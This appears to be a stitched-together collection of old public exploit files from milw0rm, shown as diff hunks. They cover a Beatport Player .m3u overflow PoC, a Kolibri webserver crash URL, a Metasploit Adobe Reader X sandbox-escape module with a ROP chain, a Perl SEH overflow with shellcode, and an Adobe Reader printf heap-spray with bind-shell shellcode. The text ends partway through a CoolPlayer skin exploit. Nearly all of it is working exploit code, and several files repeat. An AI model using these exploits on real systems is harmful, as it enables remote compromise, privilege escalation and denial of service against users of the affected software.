# Logged at Friday, May 01, 2009 14:03:17
# FileVersion: 1.0.0.283
# ProductVersion: 1.0.0.0
# Exception Code: 0xC0000005
# Exception Addr: 0x001B:0x004317F0
# Exception Module: TraktorBeatport.exe
# Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC
# The memory could not be "read"
# http://www.brothersoft.com/beatport-player-download-62319.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
# milw0rm.com [2009-05-01]
#####################################################################################################
# Beatport Player 1.0.0.283 (.M3U File) Local Stack Overflow PoC
# Discovered by SirGod - www.mortal-team.net
# Error log :
#
# Logged at Friday, May 01, 2009 14:03:17
# FileVersion: 1.0.0.283
# ProductVersion: 1.0.0.0
# Exception Code: 0xC0000005
# Exception Addr: 0x001B:0x004317F0
# Exception Module: TraktorBeatport.exe
# Exception Description: EXCEPTION_ACCESS_VIOLATION, Attempt to read from address 0x000002BC
# The memory could not be "read"
# http://www.brothersoft.com/beatport-player-download-62319.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
# milw0rm.com [2009-05-01]


@ -1,34 +1,34 @@
#############################################################################################
#
# Name : Kolibri+ Webserver 2 , Denial Of service / Crash
# Author : Usman Saeed
# Company : Xc0re Security Reasearch Group
# Date : 06/09/09
# Homepage : http://www.xc0re.net
#
#############################################################################################
[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Exploitation :
[+] [Denial Of Service / CRASH]
("A" x 200; #Late crash)
Exploit:
http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# milw0rm.com [2009-09-10]
#############################################################################################
#
# Name : Kolibri+ Webserver 2 , Denial Of service / Crash
# Author : Usman Saeed
# Company : Xc0re Security Reasearch Group
# Date : 06/09/09
# Homepage : http://www.xc0re.net
#
#############################################################################################
[*] Download Page :
http://download.cnet.com/Kolibri-WebServer/3000-10248_4-10896378.html?tag=mncol
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Exploitation :
[+] [Denial Of Service / CRASH]
("A" x 200; #Late crash)
Exploit:
http://127.0.0.1/default.aspAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# milw0rm.com [2009-09-10]


@ -1,358 +0,0 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
require 'msf/core/post/common'
require 'msf/core/post/file'
class Metasploit3 < Msf::Exploit::Local
Rank = GreatRanking
include Msf::Exploit::EXE
include Msf::Post::Common
include Msf::Post::File
include Msf::Post::Windows::Registry
def initialize(info={})
super(update_info(info, {
'Name' => 'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass',
'Description' => %q{
This module exploits a vulnerability on Adobe Reader X Sandbox. The
vulnerability is due to a sandbox rule allowing a Low Integrity AcroRd32.exe
process to write register values which can be used to trigger a buffer overflow on
the AdobeCollabSync component, allowing to achieve Medium Integrity Level
privileges from a Low Integrity AcroRd32.exe process. This module has been tested
successfully on Adobe Reader X 10.1.4 over Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Felipe Andres Manzano', # Vulnerability discovery and PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-2730' ],
[ 'OSVDB', '93355' ],
[ 'URL', 'http://blog.binamuse.com/2013/05/adobe-reader-x-collab-sandbox-bypass.html' ]
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => 'meterpreter',
'Payload' =>
{
'Space' => 12288,
'DisableNops' => true
},
'Targets' =>
[
[ 'Adobe Reader X 10.1.4 / Windows 7 SP1',
{
'AdobeCollabSyncTrigger' => 0x18fa0,
'AdobeCollabSyncTriggerSignature' => "\x56\x68\xBC\x00\x00\x00\xE8\xF5\xFD\xFF\xFF"
}
],
],
'DefaultTarget' => 0,
'DisclosureDate'=> 'May 14 2013'
}))
end
def on_new_session
print_status("Deleting Malicious Registry Keys...")
if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode by yourself")
end
if not registry_deletekey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
print_error("Delete HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB by yourself")
end
print_status("Cleanup finished")
end
# Test the process integrity level by trying to create a directory on the TEMP folder
# Access should be granted with Medium Integrity Level
# Access should be denied with Low Integrity Level
# Usint this solution atm because I'm experiencing problems with railgun when trying
# use GetTokenInformation
def low_integrity_level?
tmp_dir = expand_path("%TEMP%")
cd(tmp_dir)
new_dir = "#{rand_text_alpha(5)}"
begin
session.shell_command_token("mkdir #{new_dir}")
rescue
return true
end
if directory?(new_dir)
session.shell_command_token("rmdir #{new_dir}")
return false
else
return true
end
end
def check_trigger
signature = session.railgun.memread(@addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger'], target['AdobeCollabSyncTriggerSignature'].length)
if signature == target['AdobeCollabSyncTriggerSignature']
return true
end
return false
end
def collect_addresses
# find the trigger to launch AdobeCollabSyncTrigger.exe from AcroRd32.exe
@addresses['trigger'] = @addresses['AcroRd32.exe'] + target['AdobeCollabSyncTrigger']
vprint_good("AdobeCollabSyncTrigger trigger address found at 0x#{@addresses['trigger'].to_s(16)}")
# find kernel32.dll
kernel32 = session.railgun.kernel32.GetModuleHandleA("kernel32.dll")
@addresses['kernel32.dll'] = kernel32["return"]
if @addresses['kernel32.dll'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find kernel32.dll")
end
vprint_good("kernel32.dll address found at 0x#{@addresses['kernel32.dll'].to_s(16)}")
# find kernel32.dll methods
virtual_alloc = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "VirtualAlloc")
@addresses['VirtualAlloc'] = virtual_alloc["return"]
if @addresses['VirtualAlloc'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find VirtualAlloc")
end
vprint_good("VirtualAlloc address found at 0x#{@addresses['VirtualAlloc'].to_s(16)}")
reg_get_value = session.railgun.kernel32.GetProcAddress(@addresses['kernel32.dll'], "RegGetValueA")
@addresses['RegGetValueA'] = reg_get_value["return"]
if @addresses['RegGetValueA'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find RegGetValueA")
end
vprint_good("RegGetValueA address found at 0x#{@addresses['RegGetValueA'].to_s(16)}")
# find ntdll.dll
ntdll = session.railgun.kernel32.GetModuleHandleA("ntdll.dll")
@addresses['ntdll.dll'] = ntdll["return"]
if @addresses['ntdll.dll'] == 0
fail_with(Exploit::Failure::Unknown, "Unable to find ntdll.dll")
end
vprint_good("ntdll.dll address found at 0x#{@addresses['ntdll.dll'].to_s(16)}")
end
# Search a gadget identified by pattern on the process memory
def search_gadget(base, offset_start, offset_end, pattern)
mem = base + offset_start
length = offset_end - offset_start
mem_contents = session.railgun.memread(mem, length)
return mem_contents.index(pattern)
end
# Search for gadgets on ntdll.dll
def search_gadgets
ntdll_text_base = 0x10000
search_length = 0xd6000
@gadgets['mov [edi], ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x89\x0f\xc3")
if @gadgets['mov [edi], ecx # ret'].nil?
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'mov [edi], ecx # ret'")
end
@gadgets['mov [edi], ecx # ret'] += @addresses['ntdll.dll']
@gadgets['mov [edi], ecx # ret'] += ntdll_text_base
vprint_good("Gadget 'mov [edi], ecx # ret' found at 0x#{@gadgets['mov [edi], ecx # ret'].to_s(16)}")
@gadgets['ret'] = @gadgets['mov [edi], ecx # ret'] + 2
vprint_good("Gadget 'ret' found at 0x#{@gadgets['ret'].to_s(16)}")
@gadgets['pop edi # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x5f\xc3")
if @gadgets['pop edi # ret'].nil?
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop edi # ret'")
end
@gadgets['pop edi # ret'] += @addresses['ntdll.dll']
@gadgets['pop edi # ret'] += ntdll_text_base
vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop edi # ret'].to_s(16)}")
@gadgets['pop ecx # ret'] = search_gadget(@addresses['ntdll.dll'], ntdll_text_base, search_length, "\x59\xc3")
if @gadgets['pop ecx # ret'].nil?
fail_with(Exploit::Failure::Unknown, "Unable to find gadget 'pop ecx # ret'")
end
@gadgets['pop ecx # ret'] += @addresses['ntdll.dll']
@gadgets['pop ecx # ret'] += ntdll_text_base
vprint_good("Gadget 'pop edi # ret' found at 0x#{@gadgets['pop ecx # ret'].to_s(16)}")
end
def store(buf, data, address)
i = 0
while (i < data.length)
buf << [@gadgets['pop edi # ret']].pack("V")
buf << [address + i].pack("V") # edi
buf << [@gadgets['pop ecx # ret']].pack("V")
buf << data[i, 4].ljust(4,"\x00") # ecx
buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
i = i + 4
end
return i
end
def create_rop_chain
mem = 0x0c0c0c0c
buf = [0x58000000 + 1].pack("V")
buf << [0x58000000 + 2].pack("V")
buf << [0].pack("V")
buf << [0x58000000 + 4].pack("V")
buf << [0x58000000 + 5].pack("V")
buf << [0x58000000 + 6].pack("V")
buf << [0x58000000 + 7].pack("V")
buf << [@gadgets['ret']].pack("V")
buf << rand_text(8)
# Allocate Memory To store the shellcode and the necessary data to read the
# shellcode stored in the registry
buf << [@addresses['VirtualAlloc']].pack("V")
buf << [@gadgets['ret']].pack("V")
buf << [mem].pack("V") # lpAddress
buf << [0x00010000].pack("V") # SIZE_T dwSize
buf << [0x00003000].pack("V") # DWORD flAllocationType
buf << [0x00000040].pack("V") # flProtect
# Put in the allocated memory the necessary data in order to read the
# shellcode stored in the registry
# 1) The reg sub key: Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions
reg_key = "Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\x00"
reg_key_length = store(buf, reg_key, mem)
# 2) The reg entry: shellcode
value_key = "shellcode\x00"
store(buf, value_key, mem + reg_key_length)
# 3) The output buffer size: 0x3000
size_buffer = 0x3000
buf << [@gadgets['pop edi # ret']].pack("V")
buf << [mem + 0x50].pack("V") # edi
buf << [@gadgets['pop ecx # ret']].pack("V")
buf << [size_buffer].pack("V") # ecx
buf << [@gadgets['mov [edi], ecx # ret']].pack("V")
# Copy the shellcode from the the registry to the
# memory allocated with executable permissions and
# ret into there
buf << [@addresses['RegGetValueA']].pack("V")
buf << [mem + 0x1000].pack("V") # ret to shellcode
buf << [0x80000001].pack("V") # hkey => HKEY_CURRENT_USER
buf << [mem].pack("V") # lpSubKey
buf << [mem + 0x3c].pack("V") # lpValue
buf << [0x0000FFFF].pack("V") # dwFlags => RRF_RT_ANY
buf << [0].pack("V") # pdwType
buf << [mem + 0x1000].pack("V") # pvData
buf << [mem + 0x50].pack("V") # pcbData
end
# Store shellcode and AdobeCollabSync.exe Overflow trigger in the Registry
def store_data_registry(buf)
vprint_status("Creating the Registry Key to store the shellcode...")
if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\shellcode")
vprint_good("Registry Key created")
else
fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Key to store the shellcode")
end
vprint_status("Storing the shellcode in the Registry...")
if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "shellcode", payload.encoded, "REG_BINARY")
vprint_good("Shellcode stored")
else
fail_with(Exploit::Failure::Unknown, "Failed to store shellcode in the Registry")
end
# Create the Malicious registry entry in order to exploit....
vprint_status("Creating the Registry Key to trigger the Overflow...")
if registry_createkey("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions\\bDeleteDB")
vprint_good("Registry Key created")
else
fail_with(Exploit::Failure::Unknown, "Failed to create the Registry Entry to trigger the Overflow")
end
vprint_status("Storing the trigger in the Registry...")
if registry_setvaldata("HKCU\\Software\\Adobe\\Adobe Synchronizer\\10.0\\DBRecoveryOptions", "bDeleteDB", buf, "REG_BINARY")
vprint_good("Trigger stored")
else
fail_with(Exploit::Failure::Unknown, "Failed to store the trigger in the Registry")
end
end
def trigger_overflow
vprint_status("Creating the thread to trigger the Overflow on AdobeCollabSync.exe...")
# Create a thread in order to execute the necessary code to launch AdobeCollabSync
ret = session.railgun.kernel32.CreateThread(nil, 0, @addresses['trigger'], nil, "CREATE_SUSPENDED", nil)
if ret['return'] < 1
print_error("Unable to CreateThread")
return
end
hthread = ret['return']
vprint_status("Resuming the Thread...")
# Resume the thread to actually Launch AdobeCollabSync and trigger the vulnerability!
ret = client.railgun.kernel32.ResumeThread(hthread)
if ret['return'] < 1
fail_with(Exploit::Failure::Unknown, "Unable to ResumeThread")
end
end
def check
@addresses = {}
acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
@addresses['AcroRd32.exe'] = acrord32["return"]
if @addresses['AcroRd32.exe'] == 0
return Msf::Exploit::CheckCode::Unknown
elsif check_trigger
return Msf::Exploit::CheckCode::Vulnerable
else
return Msf::Exploit::CheckCode::Detected
end
end
def exploit
@addresses = {}
@gadgets = {}
print_status("Verifying we're in the correct target process...")
acrord32 = session.railgun.kernel32.GetModuleHandleA("AcroRd32.exe")
@addresses['AcroRd32.exe'] = acrord32["return"]
if @addresses['AcroRd32.exe'] == 0
fail_with(Exploit::Failure::NoTarget, "AcroRd32.exe process not found")
end
vprint_good("AcroRd32.exe found at 0x#{@addresses['AcroRd32.exe'].to_s(16)}")
print_status("Checking the AcroRd32.exe image...")
if not check_trigger
fail_with(Exploit::Failure::NoTarget, "Please check the target, the AcroRd32.exe process doesn't match with the target")
end
print_status("Checking the Process Integrity Level...")
if not low_integrity_level?
fail_with(Exploit::Failure::NoTarget, "Looks like you don't need this Exploit since you're already enjoying Medium Level")
end
print_status("Collecting necessary addresses for exploit...")
collect_addresses
print_status("Searching the gadgets needed to build the ROP chain...")
search_gadgets
print_good("Gadgets collected...")
print_status("Building the ROP chain...")
buf = create_rop_chain
print_good("ROP chain ready...")
print_status("Storing the shellcode and the trigger in the Registry...")
store_data_registry(buf)
print_status("Executing AdobeCollabSync.exe...")
trigger_overflow
end
end


@ -1,27 +1,27 @@
#!/usr/bin/perl
# k`sOSe - 07/29/2008
use warnings;
use strict;
# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" .
"\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" .
"\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" .
"\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" .
"\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" .
"\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" .
"\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" .
"\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" .
"\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" .
"\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" .
"\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" .
"\x1e\x28\x44\xd4";
print $shellcode .
"\x41" x (218 - length($shellcode)) .
"\x32\x4c\x3c\x7e" ; # call ebx user32.dll winxp sp3
# milw0rm.com [2008-07-29]
#!/usr/bin/perl
# k`sOSe - 07/29/2008
use warnings;
use strict;
# http://www.metasploit.com
# EXITFUNC=seh, CMD=c:\WINDOWS\system32\calc.exe
# [*] x86/shikata_ga_nai succeeded, final size 169
my $shellcode = "\xd9\xca\xd9\x74\x24\xf4\x5e\xb8\xf5\x65\x2d\xfb\x31\xc9\xb1" .
"\x24\x31\x46\x19\x83\xee\xfc\x03\x46\x15\x17\x90\xd1\x13\x93" .
"\x5b\x2a\xe4\x90\x19\x16\x6f\xda\xa4\x1e\x6e\xcd\x2c\x91\x68" .
"\x9a\x6c\x0e\x88\x77\xdb\xc5\xbe\x0c\xdd\x37\x8f\xd2\x47\x6b" .
"\x74\x12\x03\x73\xb4\x58\xe1\x7a\xf4\xb7\x0e\x47\xac\x63\xeb" .
"\xcd\xa9\xe0\xac\x09\x33\x1d\x34\xd9\x3f\xaa\x32\x82\x23\x2d" .
"\xae\xb6\x40\xa6\x31\x22\xf1\xe4\x15\xb0\xc1\x4b\x67\x4e\xa5" .
"\x25\xe3\x25\x60\xf9\x60\x79\x61\x72\x06\x66\xd4\x0f\x8f\x9e" .
"\xaf\xf7\xd3\x5f\xc5\x57\xbc\xaf\x90\x53\x63\x38\x3d\xa5\x11" .
"\xb6\x6a\xa6\xc1\xa4\xae\x04\x59\x62\x81\xf0\x2a\x23\x4e\xa4" .
"\xc7\xb2\x03\x20\x4d\x28\xd7\xfa\xd1\xd1\x76\x96\x8a\x3b\x1c" .
"\x1e\x28\x44\xd4";
print $shellcode .
"\x41" x (218 - length($shellcode)) .
"\x32\x4c\x3c\x7e" ; # call ebx user32.dll winxp sp3
# milw0rm.com [2008-07-29]


@ -1,43 +1,43 @@
Adobe Reader Javascript Printf Buffer Overflow Exploit
===========================================================
Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
CVE-2008-2992
Thanks to coresecurity for the technical background.
6Nov,2008: Exploit released by me
Credits: Debasis Mohanty
www.hackingspirits.com
www.coffeeandsecurity.com
===========================================================
//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
//www.coffeeandsecurity
//www.hackingspirits.com
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
var payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u
4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350");
//Heap Spray starts here - Kiddos don't mess up with this
var nop ="";
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + payload;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;
// reference snippet from core security
// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
util.printf("%45000f",num);
# milw0rm.com [2008-11-05]
Adobe Reader Javascript Printf Buffer Overflow Exploit
===========================================================
Reference: http://www.coresecurity.com/content/adobe-reader-buffer-overflow
CVE-2008-2992
Thanks to coresecurity for the technical background.
6Nov,2008: Exploit released by me
Credits: Debasis Mohanty
www.hackingspirits.com
www.coffeeandsecurity.com
===========================================================
//Exploit by Debasis Mohanty (aka nopsledge/Tr0y)
//www.coffeeandsecurity
//www.hackingspirits.com
// win32_bind - EXITFUNC=seh LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
var payload = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u4937%u5a51%u436a%u3058%u3142%u4150%u6b42%u4141%u4153%u4132%u3241%u4142%u4230%u5841%u3850%u4241%u7875%u4b69%u724c%u584a%u526b%u4a6d%u4a48%u6b59%u6b4f%u694f%u416f%u4e70%u526b%u744c%u4164%u6e34%u376b%u5535%u4c6c%u714b%u646c%u6145%u7468%u6a41%u6e4f%u626b%u326f%u6c38%u334b%u376f%u5550%u7851%u316b%u6c59%u504b%u6e34%u466b%u6861%u456e%u6f61%u6c30%u6c59%u6b6c%u3934%u4150%u3764%u6877%u6941%u565a%u636d%u4b31%u7872%u6c6b%u7534%u566b%u3134%u5734%u5458%u6b35%u6e55%u336b%u556f%u7474%u7841%u416b%u4c76%u464b%u626c%u6e6b%u416b%u354f%u564c%u6861%u666b%u3663%u6c4c%u6b4b%u7239%u444c%u5764%u616c%u4f71%u4733%u6b41%u336b%u4c54%u634b%u7073%u6c30%u534b%u6470%u6c4c%u724b%u4550%u4e4c%u6c4d%u374b%u7530%u7358%u426e%u4c48%u524e%u466e%u586e%u566c%u3930%u586f%u7156%u4676%u7233%u6346%u3058%u7033%u3332%u5458%u5237%u4553%u5162%u504f%u4b54%u5a4f%u3370%u6a58%u686b%u596d%u456c%u466b%u4930%u596f%u7346%u4e6f%u5869%u7365%u4d56%u5851%u366d%u6468%u7242%u7275%u674a%u5972%u6e6f%u7230%u4a48%u5679%u6b69%u6e45%u764d%u6b37%u584f%u3356%u3063%u5053%u7653%u7033%u3353%u5373%u3763%u5633%u6b33%u5a4f%u3270%u5046%u3568%u7141%u304c%u3366%u6c63%u6d49%u6a31%u7035%u6e68%u3544%u524a%u4b50%u7177%u4b47%u4e4f%u3036%u526a%u3130%u7041%u5955%u6e6f%u3030%u6c68%u4c64%u546d%u796e%u3179%u5947%u596f%u4646%u6633%u6b35%u584f%u6350%u4b58%u7355%u4c79%u4146%u6359%u4b67%u784f%u7656%u5330%u4164%u3344%u7965%u4e6f%u4e30%u7173%u5878%u6167%u6969%u7156%u6269%u3977%u6a6f%u5176%u4945%u4e6f%u5130%u5376%u715a%u7274%u6246%u3048%u3063%u6c6d%u5a49%u6345%u625a%u7670%u3139%u5839%u4e4c%u4d69%u5337%u335a%u4e74%u4b69%u5652%u4b51%u6c70%u6f33%u495a%u336e%u4472%u6b6d%u374e%u7632%u6e4c%u6c73%u704d%u767a%u6c58%u4e6b%u4c4b%u736b%u5358%u7942%u6d6e%u7463%u6b56%u304f%u7075%u4b44%u794f%u5346%u706b%u7057%u7152%u5041%u4251%u4171%u337a%u4231%u4171%u5141%u6645%u6931%u5a6f%u5070%u6e68%u5a4d%u5679%u6865%u334e%u3963%u586f%u6356%u4b5a%u4b4f%u704f%u4b37%u4a4f%u4c70%u614b%u6b47%u
4d4c%u6b53%u3174%u4974%u596f%u7046%u5952%u4e6f%u6330%u6c58%u6f30%u577a%u6174%u324f%u4b73%u684f%u3956%u386f%u4350");
//Heap Spray starts here - Kiddos don't mess up with this
var nop ="";
for (iCnt=128;iCnt>=0;--iCnt) nop += unescape("%u9090%u9090%u9090%u9090%u9090");
heapblock = nop + payload;
bigblock = unescape("%u9090%u9090");
headersize = 20;
spray = headersize+heapblock.length
while (bigblock.length<spray) bigblock+=bigblock;
fillblock = bigblock.substring(0, spray);
block = bigblock.substring(0, bigblock.length-spray);
while(block.length+spray < 0x40000) block = block+block+fillblock;
mem = new Array();
for (i=0;i<1400;i++) mem[i] = block + heapblock;
// reference snippet from core security
// http://www.coresecurity.com/content/adobe-reader-buffer-overflow
var num = 12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
util.printf("%45000f",num);
# milw0rm.com [2008-11-05]


@ -1,75 +1,75 @@
/*
* CoolPlayer 2.19 (Skin File) Local Buffer Overflow Exploit
*
* Advisory: http://www.bmgsec.com.au/advisory/43/
* Test box: WinXP Pro SP2 English
*
* Code reference is in skin.c, lines 464 - 480
*
* Written and discovered by:
* r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au)
*/
#include <iostream>
#include <fstream>
#include <cstdlib> //exit
using namespace std;
int main()
{
//win32_exec - EXITFUNC=process CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com
//Bad characters: 0x00, 0x0d, 0xf4
char scode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x30\x42\x50\x42\x30\x4b\x58\x45\x34\x4e\x53\x4b\x38\x4e\x57"
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x38"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x48"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x35\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x38"
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x38\x4e\x30\x4b\x54"
